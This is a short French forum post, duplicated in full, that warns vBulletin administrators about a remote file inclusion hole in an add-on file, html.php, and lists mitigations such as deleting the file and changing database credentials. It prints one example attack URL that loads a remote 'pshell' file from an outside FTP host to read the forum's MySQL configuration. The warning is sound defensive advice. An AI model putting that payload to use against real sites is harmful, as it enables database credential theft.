esf
05/05/2006, 04h24
Aux licensiés de vb 3.0.x et 3.5.x qui utilise ce hack: http://www.vbulletin.org/forum/showthread.php?t=66084&page=5
(le hack a été adapté à 3.5.x).
1. Ne pas autoriser via le php le groupe Non inscrit
2. Ne pas désactiver le remote integration (activé par défaut)
3. Ou carrément supprimer le fichier concerné.
Possibilité de hacking avec un truc du genre: /forum/html.php?file=ftp://jeanhack:45310133@ftp.usuarios.lycos.es/pshell.htm
Ca fait quoi? ca va chercher ls config MySQL de votre forum (user, pass, dbname, etc).
Si vous l'utilisez, je vous suggère de vous créer un autre dbusername et dbpassword.
.
.
(le hack a été adapté à 3.5.x).
1. Ne pas autoriser via le php le groupe Non inscrit
2. Ne pas désactiver le remote integration (activé par défaut)
3. Ou carrément supprimer le fichier concerné.
Possibilité de hacking avec un truc du genre: /forum/html.php?file=ftp://jeanhack:45310133@ftp.usuarios.lycos.es/pshell.htm
Ca fait quoi? ca va chercher ls config MySQL de votre forum (user, pass, dbname, etc).
Si vous l'utilisez, je vous suggère de vous créer un autre dbusername et dbpassword.
.
.